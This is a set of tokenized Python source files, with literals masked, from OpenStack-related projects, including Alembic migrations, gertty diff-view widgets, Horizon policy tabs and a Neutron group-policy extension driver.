'<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT:message>' , [ '<STR_LIT:id>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT:message>' , [ '<STR_LIT>' ] , unique = False ) <EOL> op . create_index ( op . f ( '<STR_LIT>' ) , '<STR_LIT:message>' , [ '<STR_LIT>' ] , unique = False ) <EOL> def downgrade ( ) : <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT:message>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT:message>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT:message>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT:message>' ) <EOL> op . drop_table ( '<STR_LIT:message>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_table ( '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_table ( '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT:label>' ) <EOL> op . drop_table ( '<STR_LIT:label>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_table ( '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_table ( '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_table ( '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_index ( op . f ( '<STR_LIT>' ) , table_name = '<STR_LIT>' ) <EOL> op . drop_table ( '<STR_LIT>' ) </s>
<s> import urwid <EOL> from gertty import keymap <EOL> from gertty import mywid <EOL> from gertty . view . diff import BaseDiffComment , BaseDiffCommentEdit , BaseDiffLine <EOL> from gertty . view . diff import BaseFileHeader , BaseFileReminder , BaseDiffView <EOL> LN_COL_WIDTH = <NUM_LIT:5> <EOL> class SideDiffCommentEdit ( BaseDiffCommentEdit ) : <EOL> def __init__ ( self , app , context , old_key = None , new_key = None , old = u'<STR_LIT>' , new = u'<STR_LIT>' ) : <EOL> super ( SideDiffCommentEdit , self ) . __init__ ( [ ] ) <EOL> self . app = app <EOL> self . context = context <EOL> self . old_key = old_key <EOL> self . new_key = new_key <EOL> self . old = mywid . MyEdit ( edit_text = old , multiline = True , ring = app . ring ) <EOL> self . new = mywid . MyEdit ( edit_text = new , multiline = True , ring = app . ring ) <EOL> self . contents . append ( ( urwid . Text ( u'<STR_LIT>' ) , ( '<STR_LIT>' , LN_COL_WIDTH , False ) ) ) <EOL> if context . old_file_key and ( context . old_ln is not None or context . header ) : <EOL> self . contents . append ( ( urwid . AttrMap ( self . old , '<STR_LIT>' ) , ( '<STR_LIT>' , <NUM_LIT:1> , False ) ) ) <EOL> else : <EOL> self . contents . append ( ( urwid . Text ( u'<STR_LIT>' ) , ( '<STR_LIT>' , <NUM_LIT:1> , False ) ) ) <EOL> self . contents . append ( ( urwid . Text ( u'<STR_LIT>' ) , ( '<STR_LIT>' , LN_COL_WIDTH , False ) ) ) <EOL> if context . new_file_key and ( context . new_ln is not None or context . header ) : <EOL> self . contents . append ( ( urwid . AttrMap ( self . new , '<STR_LIT>' ) , ( '<STR_LIT>' , <NUM_LIT:1> , False ) ) ) <EOL> new_editable = True <EOL> else : <EOL> self . contents . append ( ( urwid . Text ( u'<STR_LIT>' ) , ( '<STR_LIT>' , <NUM_LIT:1> , False ) ) ) <EOL> new_editable = False <EOL> if new_editable : <EOL> self . focus_position = <NUM_LIT:3> <EOL> else : <EOL> self . focus_position = <NUM_LIT:1> <EOL> def keypress ( self , size , key ) : <EOL> if not self . app . input_buffer : <EOL> key = super ( SideDiffCommentEdit , self ) . keypress ( size , key ) <EOL> keys = self . app . input_buffer + [ key ] <EOL> commands = self . app . config . keymap . getCommands ( keys ) <EOL> if ( ( keymap . NEXT_SELECTABLE in commands ) or <EOL> ( keymap . PREV_SELECTABLE in commands ) ) : <EOL> if ( ( self . context . old_ln is not None and <EOL> self . context . new_ln is not None ) or <EOL> self . context . header ) : <EOL> if self . focus_position == <NUM_LIT:3> : <EOL> self . focus_position = <NUM_LIT:1> <EOL> else : <EOL> self . focus_position = <NUM_LIT:3> <EOL> return None <EOL> return key <EOL> class SideDiffComment ( BaseDiffComment ) : <EOL> def __init__ ( self , context , old , new ) : <EOL> super ( SideDiffComment , self ) . __init__ ( [ ] ) <EOL> self . context = context <EOL> oldt = urwid . Text ( old ) <EOL> newt = urwid . Text ( new ) <EOL> if old : <EOL> oldt = urwid . AttrMap ( oldt , '<STR_LIT>' ) <EOL> if new : <EOL> newt = urwid . AttrMap ( newt , '<STR_LIT>' ) <EOL> self . contents . append ( ( urwid . Text ( u'<STR_LIT>' ) , ( '<STR_LIT>' , LN_COL_WIDTH , False ) ) ) <EOL> self . contents . append ( ( oldt , ( '<STR_LIT>' , <NUM_LIT:1> , False ) ) ) <EOL> self . contents . append ( ( urwid . Text ( u'<STR_LIT>' ) , ( '<STR_LIT>' , LN_COL_WIDTH , False ) ) ) <EOL> self . contents . append ( ( newt , ( '<STR_LIT>' , <NUM_LIT:1> , False ) ) ) <EOL> class SideDiffLine ( BaseDiffLine ) : <EOL> def __init__ ( self , app , context , old , new , callback = None ) : <EOL> super ( SideDiffLine , self ) . __init__ ( '<STR_LIT>' , on_press = callback ) <EOL> self . context = context <EOL> self . text_widgets = [ ] <EOL> columns = [ ] <EOL> for ( ln , action , line ) in ( old , new ) : <EOL> if ln is None : <EOL> ln = '<STR_LIT>' <EOL> else : <EOL> ln = '<STR_LIT>' % ( LN_COL_WIDTH - <NUM_LIT:1> , ln ) <EOL> ln_col = urwid . Text ( ( '<STR_LIT>' , ln ) ) <EOL> ln_col . set_wrap_mode ( '<STR_LIT>' ) <EOL> line_col = mywid . SearchableText ( line ) <EOL> self . text_widgets . append ( line_col ) <EOL> if action == '<STR_LIT>' : <EOL> line_col = urwid . AttrMap ( line_col , '<STR_LIT>' ) <EOL> columns += [ ( LN_COL_WIDTH , ln_col ) , line_col ] <EOL> col = urwid . Columns ( columns ) <EOL> map = { None : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> self . _w = urwid . AttrMap ( col , None , focus_map = map ) <EOL> def search ( self , search , attribute ) : <EOL> ret = False <EOL> for w in self . text_widgets : <EOL> if w . search ( search , attribute ) : <EOL> ret = True <EOL> return ret <EOL> class SideFileHeader ( BaseFileHeader ) : <EOL> def __init__ ( self , app , context , old , new , callback = None ) : <EOL> super ( SideFileHeader , self ) . __init__ ( '<STR_LIT>' , on_press = callback ) <EOL> self . context = context <EOL> col = urwid . Columns ( [ <EOL> urwid . Text ( ( '<STR_LIT:filename>' , old ) ) , <EOL> urwid . Text ( ( '<STR_LIT:filename>' , new ) ) ] ) <EOL> map = { None : '<STR_LIT>' , <EOL> '<STR_LIT:filename>' : '<STR_LIT>' } <EOL> self . _w = urwid . AttrMap ( col , None , focus_map = map ) <EOL> class SideFileReminder ( BaseFileReminder ) : <EOL> def __init__ ( self ) : <EOL> self . old_text = urwid . Text ( ( '<STR_LIT:filename>' , '<STR_LIT>' ) ) <EOL> self . new_text = urwid . Text ( ( '<STR_LIT:filename>' , '<STR_LIT>' ) ) <EOL> col = urwid . Columns ( [ self . old_text , self . new_text ] ) <EOL> super ( SideFileReminder , self ) . __init__ ( col ) <EOL> def set ( self , old , new ) : <EOL> self . old_text . set_text ( ( '<STR_LIT:filename>' , old ) ) <EOL> self . new_text . set_text ( ( '<STR_LIT:filename>' , new ) ) <EOL> class SideDiffView ( BaseDiffView ) : <EOL> def makeLines ( self , diff , lines_to_add , comment_lists ) : <EOL> lines = [ ] <EOL> for old , new in lines_to_add : <EOL> context = self . makeContext ( diff , old [ <NUM_LIT:0> ] , new [ <NUM_LIT:0> ] ) <EOL> lines . append ( SideDiffLine ( self . app , context , old , new , <EOL> callback = self . onSelect ) ) <EOL> key = '<STR_LIT>' % ( old [ <NUM_LIT:0> ] , diff . oldname ) <EOL> old_list = comment_lists . pop ( key , [ ] ) <EOL> key = '<STR_LIT>' % ( new [ <NUM_LIT:0> ] , diff . newname ) <EOL> new_list = comment_lists . pop ( key , [ ] ) <EOL> while old_list or new_list : <EOL> old_comment_key = new_comment_key = None <EOL> old_comment = new_comment = u'<STR_LIT>' <EOL> if old_list : <EOL> ( old_comment_key , old_comment ) = old_list . pop ( <NUM_LIT:0> ) <EOL> if new_list : <EOL> ( new_comment_key , new_comment ) = new_list . pop ( <NUM_LIT:0> ) <EOL> lines . append ( SideDiffComment ( context , old_comment , new_comment ) ) <EOL> key = '<STR_LIT>' % ( old [ <NUM_LIT:0> ] , diff . oldname ) <EOL> old_list = comment_lists . pop ( key , [ ] ) <EOL> key = '<STR_LIT>' % ( new [ <NUM_LIT:0> ] , diff . newname ) <EOL> new_list = comment_lists . pop ( key , [ ] ) <EOL> while old_list or new_list : <EOL> old_comment_key = new_comment_key = None <EOL> old_comment = new_comment = u'<STR_LIT>' <EOL> if old_list : <EOL> ( old_comment_key , old_comment ) = old_list . pop ( <NUM_LIT:0> ) <EOL> if new_list : <EOL> ( new_comment_key , new_comment ) = new_list . pop ( <NUM_LIT:0> ) <EOL> lines . append ( SideDiffCommentEdit ( self . app , context , <EOL> old_comment_key , <EOL> new_comment_key , <EOL> old_comment , new_comment ) ) <EOL> return lines <EOL> def makeFileReminder ( self ) : <EOL> return SideFileReminder ( ) <EOL> def makeFileHeader ( self , diff , comment_lists ) : <EOL> context = self . makeContext ( diff , None , None , header = True ) <EOL> lines = [ ] <EOL> lines . append ( SideFileHeader ( self . app , context , diff . oldname , diff . newname , <EOL> callback = self . onSelect ) ) <EOL> key = '<STR_LIT>' % ( diff . oldname , ) <EOL> old_list = comment_lists . pop ( key , [ ] ) <EOL> key = '<STR_LIT>' % ( diff . newname , ) <EOL> new_list = comment_lists . pop ( key , [ ] ) <EOL> while old_list or new_list : <EOL> old_comment_key = new_comment_key = None <EOL> old_comment = new_comment = u'<STR_LIT>' <EOL> if old_list : <EOL> ( old_comment_key , old_comment ) = old_list . pop ( <NUM_LIT:0> ) <EOL> if new_list : <EOL> ( new_comment_key , new_comment ) = new_list . pop ( <NUM_LIT:0> ) <EOL> lines . append ( SideDiffComment ( context , old_comment , new_comment ) ) <EOL> key = '<STR_LIT>' % ( diff . oldname , ) <EOL> old_list = comment_lists . pop ( key , [ ] ) <EOL> key = '<STR_LIT>' % ( diff . newname , ) <EOL> new_list = comment_lists . pop ( key , [ ] ) <EOL> while old_list or new_list : <EOL> old_comment_key = new_comment_key = None <EOL> old_comment = new_comment = u'<STR_LIT>' <EOL> if old_list : <EOL> ( old_comment_key , old_comment ) = old_list . pop ( <NUM_LIT:0> ) <EOL> if new_list : <EOL> ( new_comment_key , new_comment ) = new_list . pop ( <NUM_LIT:0> ) <EOL> lines . append ( SideDiffCommentEdit ( self . app , context , <EOL> old_comment_key , <EOL> new_comment_key , <EOL> old_comment , new_comment ) ) <EOL> return lines <EOL> def makeCommentEdit ( self , edit ) : <EOL> return SideDiffCommentEdit ( self . app , edit . context ) <EOL> def cleanupEdit ( self , edit ) : <EOL> if edit . old_key : <EOL> self . deleteComment ( edit . old_key ) <EOL> edit . old_key = None <EOL> if edit . new_key : <EOL> self . deleteComment ( edit . new_key ) <EOL> edit . new_key = None <EOL> old = edit . old . edit_text . strip ( ) <EOL> new = edit . new . edit_text . strip ( ) <EOL> if old or new : <EOL> if old : <EOL> edit . old_key = self . saveComment ( <EOL> edit . context , old , new = False ) <EOL> if new : <EOL> edit . new_key = self . saveComment ( <EOL> edit . context , new , new = True ) <EOL> else : <EOL> self . listbox . body . remove ( edit ) </s>
<s> import os <EOL> from pprint import pformat <EOL> from testscenarios import TestWithScenarios <EOL> from testtools . content import text_content <EOL> from git_upstream . tests . base import BaseTestCase <EOL> from git_upstream . tests . base import get_scenarios <EOL> import_command = __import__ ( "<STR_LIT>" , globals ( ) , <EOL> locals ( ) , [ '<STR_LIT>' ] , - <NUM_LIT:1> ) <EOL> LocateChangesWalk = import_command . LocateChangesWalk <EOL> class TestStrategies ( TestWithScenarios , BaseTestCase ) : <EOL> scenarios = get_scenarios ( os . path . join ( os . path . dirname ( __file__ ) , <EOL> "<STR_LIT>" ) ) <EOL> def setUp ( self ) : <EOL> self . addDetail ( '<STR_LIT:description>' , text_content ( self . desc ) ) <EOL> super ( TestStrategies , self ) . setUp ( ) <EOL> self . addDetail ( '<STR_LIT>' , <EOL> text_content ( pformat ( <EOL> list ( ( c , self . _graph [ c ] . hexsha ) <EOL> for c in self . expected_changes ) ) ) ) <EOL> def test_search_changes ( self ) : <EOL> strategy = LocateChangesWalk ( <EOL> branch = self . branches [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , <EOL> search_refs = [ self . branches [ '<STR_LIT>' ] [ <NUM_LIT:0> ] ] ) <EOL> self . assertEqual ( self . _commits_from_nodes ( self . expected_changes ) , <EOL> [ c for c in strategy . filtered_iter ( ) ] ) </s>
<s> from glance_store import driver <EOL> from glance_store import exceptions <EOL> class UnconfigurableStore ( driver . Store ) : <EOL> def configure ( self , re_raise_bsc = False ) : <EOL> raise exceptions . BadStoreConfiguration ( ) </s>
<s> import testtools <EOL> class TestCase ( testtools . TestCase ) : <EOL> """<STR_LIT>""" </s>
<s> from django . core . urlresolvers import reverse_lazy <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import tabs <EOL> from gbpui import client <EOL> from gbpui import column_filters as gfilters <EOL> import tables <EOL> class L3PolicyDetailsTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> failure_url = reverse_lazy ( '<STR_LIT>' ) <EOL> def get_context_data ( self , request ) : <EOL> l3policy_id = self . tab_group . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> l3policy = client . l3policy_get ( request , l3policy_id ) <EOL> except Exception : <EOL> exceptions . handle ( <EOL> request , _ ( '<STR_LIT>' ) , <EOL> redirect = self . failure_url ) <EOL> return { '<STR_LIT>' : l3policy } <EOL> class L3PolicyTab ( tabs . TableTab ) : <EOL> table_classes = ( tables . L3PolicyTable , ) <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> def get_l3policy_table_data ( self ) : <EOL> policies = [ ] <EOL> try : <EOL> policies = client . l3policy_list ( self . request , <EOL> tenant_id = self . request . user . tenant_id ) <EOL> update = lambda x : gfilters . update_l3_policy_attributes ( <EOL> self . request , x ) <EOL> policies = [ update ( item ) for item in policies ] <EOL> except Exception : <EOL> policies = [ ] <EOL> exceptions . handle ( self . tab_group . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> return policies <EOL> class L2PolicyTab ( tabs . TableTab ) : <EOL> table_classes = ( tables . L2PolicyTable , ) <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> def get_l2policy_table_data ( self ) : <EOL> policies = [ ] <EOL> try : <EOL> policies = client . l2policy_list ( self . request , <EOL> tenant_id = self . request . user . tenant_id ) <EOL> except Exception : <EOL> policies = [ ] <EOL> exceptions . handle ( self . tab_group . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> return policies <EOL> class ServicePolicyTab ( tabs . TableTab ) : <EOL> table_classes = ( tables . ServicePolicyTable , ) <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> def get_service_policy_table_data ( self ) : <EOL> policies = [ ] <EOL> try : <EOL> policies = client . networkservicepolicy_list ( self . request , <EOL> tenant_id = self . request . user . tenant_id ) <EOL> update = lambda x : gfilters . update_service_policy_attributes ( x ) <EOL> policies = [ update ( item ) for item in policies ] <EOL> except Exception : <EOL> exceptions . handle ( self . tab_group . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> return policies <EOL> class ServicePolicyDetailsTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> failure_url = reverse_lazy ( '<STR_LIT>' ) <EOL> def get_context_data ( self , request ) : <EOL> policy_id = self . tab_group . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> policy = client . get_networkservice_policy ( request , policy_id ) <EOL> except Exception : <EOL> exceptions . handle ( <EOL> request , _ ( '<STR_LIT>' ) , <EOL> redirect = self . failure_url ) <EOL> return { '<STR_LIT>' : policy } <EOL> class ExternalConnectivityTab ( tabs . TableTab ) : <EOL> table_classes = ( tables . ExternalConnectivityTable , ) <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> def get_external_connectivity_table_data ( self ) : <EOL> external_segment_list = [ ] <EOL> try : <EOL> external_segment_list = client . externalconnectivity_list ( self . request , <EOL> self . request . user . tenant_id ) <EOL> except Exception : <EOL> exceptions . handle ( self . tab_group . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> return external_segment_list <EOL> class ExternalConnectivityDetailsTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> failure_url = reverse_lazy ( '<STR_LIT>' ) <EOL> def get_context_data ( self , request ) : <EOL> external_connectivity_id = self . tab_group . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> external_connectivity = client . get_externalconnectivity ( request , <EOL> external_connectivity_id ) <EOL> except Exception : <EOL> exceptions . handle ( <EOL> request , _ ( '<STR_LIT>' ) , <EOL> redirect = self . failure_url ) <EOL> return { '<STR_LIT>' : external_connectivity } <EOL> class NATPoolTab ( tabs . TableTab ) : <EOL> table_classes = ( tables . NATPoolTable , ) <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> def get_nat_pool_table_data ( self ) : <EOL> nat_pool_list = [ ] <EOL> try : <EOL> nat_pools = client . natpool_list ( self . request , <EOL> self . request . user . tenant_id ) <EOL> update = lambda x : gfilters . update_nat_pool_attributes ( <EOL> self . request , x ) <EOL> nat_pool_list = [ update ( nat_pool ) for nat_pool in nat_pools ] <EOL> except Exception : <EOL> exceptions . handle ( self . tab_group . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> return nat_pool_list <EOL> class NATPoolDetailsTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> failure_url = reverse_lazy ( '<STR_LIT>' ) <EOL> def get_context_data ( self , request ) : <EOL> nat_pool_id = self . tab_group . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> nat_pool = client . get_natpool ( request , <EOL> nat_pool_id ) <EOL> except Exception : <EOL> exceptions . handle ( <EOL> request , _ ( '<STR_LIT>' ) , <EOL> redirect = self . failure_url ) <EOL> return { '<STR_LIT>' : nat_pool } <EOL> class ServicePolicyDetailsTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( ServicePolicyDetailsTab , ) <EOL> sticky = True <EOL> class ExternalConnectivityDetailsTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( ExternalConnectivityDetailsTab , ) <EOL> sticky = True <EOL> class NATPoolDetailsTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( NATPoolDetailsTab , ) <EOL> sticky = True <EOL> class L3PolicyTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( L3PolicyTab , ServicePolicyTab , ExternalConnectivityTab , NATPoolTab ) <EOL> sticky = True <EOL> class L2PolicyDetailsTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> failure_url = reverse_lazy ( '<STR_LIT>' ) <EOL> def get_context_data ( self , request ) : <EOL> l2policy_id = self . tab_group . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> l2policy = client . l2policy_get ( request , l2policy_id ) <EOL> ptgs = [ ] <EOL> for item in l2policy . policy_target_groups : <EOL> ptgs . append ( client . policy_target_get ( request , item ) ) <EOL> setattr ( l2policy , '<STR_LIT>' , ptgs ) <EOL> except Exception : <EOL> exceptions . handle ( <EOL> request , _ ( '<STR_LIT>' ) , <EOL> redirect = self . failure_url ) <EOL> return { '<STR_LIT>' : l2policy } <EOL> class L2PolicyDetailsTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( L2PolicyDetailsTab , ) <EOL> class L3PolicyDetailsTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( L3PolicyDetailsTab , L2PolicyTab , ) </s>
<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> from alembic import op <EOL> from neutron . db import migration <EOL> from sqlalchemy . engine import reflection <EOL> def upgrade ( active_plugins = None , options = None ) : <EOL> inspector = reflection . Inspector . from_engine ( op . get_bind ( ) ) <EOL> unique_constraints = inspector . get_unique_constraints ( <EOL> '<STR_LIT>' ) <EOL> for constraint in unique_constraints : <EOL> if constraint [ '<STR_LIT>' ] == [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] : <EOL> with migration . remove_fks_from_table ( <EOL> '<STR_LIT>' ) : <EOL> op . drop_constraint ( constraint [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> break <EOL> def downgrade ( active_plugins = None , options = None ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> from alembic import op <EOL> import sqlalchemy as sa <EOL> def upgrade ( active_plugins = None , options = None ) : <EOL> op . create_table ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , <EOL> sa . String ( length = <NUM_LIT> ) , <EOL> nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , <EOL> sa . String ( length = <NUM_LIT> ) , <EOL> nullable = True ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> op . create_table ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , <EOL> sa . String ( length = <NUM_LIT> ) , <EOL> nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , <EOL> sa . String ( length = <NUM_LIT> ) , <EOL> nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , <EOL> sa . String ( length = <NUM_LIT> ) , <EOL> nullable = True ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) <EOL> def downgrade ( active_plugins = None , options = None ) : <EOL> op . drop_table ( '<STR_LIT>' ) <EOL> op . drop_table ( '<STR_LIT>' ) </s>
<s> from neutron . api . v2 import attributes <EOL> from oslo_log import log as logging <EOL> from gbpservice . neutron . db . grouppolicy . extensions import group_proxy_db as db <EOL> from gbpservice . neutron . db . grouppolicy import group_policy_db as gp_db <EOL> from gbpservice . neutron . extensions import driver_proxy_group <EOL> from gbpservice . neutron . services . grouppolicy import ( <EOL> group_policy_driver_api as api ) <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class ProxyGroupDriver ( api . ExtensionDriver ) : <EOL> _supported_extension_alias = '<STR_LIT>' <EOL> _extension_dict = driver_proxy_group . EXTENDED_ATTRIBUTES_2_0 <EOL> def initialize ( self ) : <EOL> pass <EOL> @ property <EOL> def extension_alias ( self ) : <EOL> return self . _supported_extension_alias <EOL> @ api . default_extension_behavior ( db . GroupProxyMapping ) <EOL> def process_create_policy_target_group ( self , session , data , result ) : <EOL> data = data [ '<STR_LIT>' ] <EOL> proxied = data . get ( '<STR_LIT>' ) <EOL> if attributes . is_attr_set ( proxied ) : <EOL> record = ( session . query ( db . GroupProxyMapping ) . filter_by ( <EOL> policy_target_group_id = proxied ) . first ( ) ) <EOL> if record : <EOL> if record . proxy_group_id : <EOL> raise driver_proxy_group . InvalidProxiedGroup ( <EOL> group_id = proxied ) <EOL> record . proxy_group_id = result [ '<STR_LIT:id>' ] <EOL> else : <EOL> record = db . GroupProxyMapping ( <EOL> policy_target_group_id = proxied , <EOL> proxy_group_id = result [ '<STR_LIT:id>' ] , <EOL> proxied_group_id = None ) <EOL> session . add ( record ) <EOL> if not attributes . is_attr_set ( data . get ( '<STR_LIT>' ) ) : <EOL> data [ '<STR_LIT>' ] = driver_proxy_group . DEFAULT_PROXY_TYPE <EOL> record = ( session . query ( db . GroupProxyMapping ) . filter_by ( <EOL> policy_target_group_id = result [ '<STR_LIT:id>' ] ) . one ( ) ) <EOL> record . proxy_type = data [ '<STR_LIT>' ] <EOL> result [ '<STR_LIT>' ] = data [ '<STR_LIT>' ] <EOL> elif attributes . is_attr_set ( data . get ( '<STR_LIT>' ) ) : <EOL> raise driver_proxy_group . ProxyTypeSetWithoutProxiedPTG ( ) <EOL> @ api . default_extension_behavior ( db . GroupProxyMapping ) <EOL> def process_update_policy_target_group ( self , session , data , result ) : <EOL> pass <EOL> @ api . default_extension_behavior ( db . GroupProxyMapping ) <EOL> def extend_policy_target_group_dict ( self , session , result ) : <EOL> pass <EOL> @ api . default_extension_behavior ( db . ProxyGatewayMapping ) <EOL> def process_create_policy_target ( self , session , data , result ) : <EOL> self . _validate_proxy_gateway ( session , data , result ) <EOL> @ api . default_extension_behavior ( db . ProxyGatewayMapping ) <EOL> def process_update_policy_target ( self , session , data , result ) : <EOL> self . _validate_proxy_gateway ( session , data , result ) <EOL> @ api . default_extension_behavior ( db . ProxyGatewayMapping ) <EOL> def extend_policy_target_dict ( self , session , result ) : <EOL> pass <EOL> def _validate_proxy_gateway ( self , session , data , result ) : <EOL> data = data [ '<STR_LIT>' ] <EOL> if data . get ( '<STR_LIT>' ) : <EOL> ptg_id = result [ '<STR_LIT>' ] <EOL> record = session . query ( db . GroupProxyMapping ) . filter_by ( <EOL> proxy_group_id = ptg_id ) . first ( ) <EOL> if not record : <EOL> raise driver_proxy_group . InvalidProxyGatewayGroup ( <EOL> group_id = ptg_id ) <EOL> @ api . default_extension_behavior ( db . ProxyIPPoolMapping ) <EOL> def process_create_l3_policy ( self , session , data , result ) : <EOL> data = data [ '<STR_LIT>' ] <EOL> gp_db . GroupPolicyDbPlugin . validate_ip_pool ( <EOL> data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] ) <EOL> gp_db . GroupPolicyDbPlugin . validate_subnet_prefix_length ( <EOL> data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] ) <EOL> @ api . default_extension_behavior ( db . ProxyIPPoolMapping ) <EOL> def process_update_l3_policy ( self , session , data , result ) : <EOL> data = data [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in data : <EOL> gp_db . GroupPolicyDbPlugin . validate_subnet_prefix_length ( <EOL> result [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] , <EOL> result [ '<STR_LIT>' ] ) <EOL> @ api . default_extension_behavior ( db . ProxyIPPoolMapping ) <EOL> def extend_l3_policy_dict ( self , session , result ) : <EOL> pass </s>
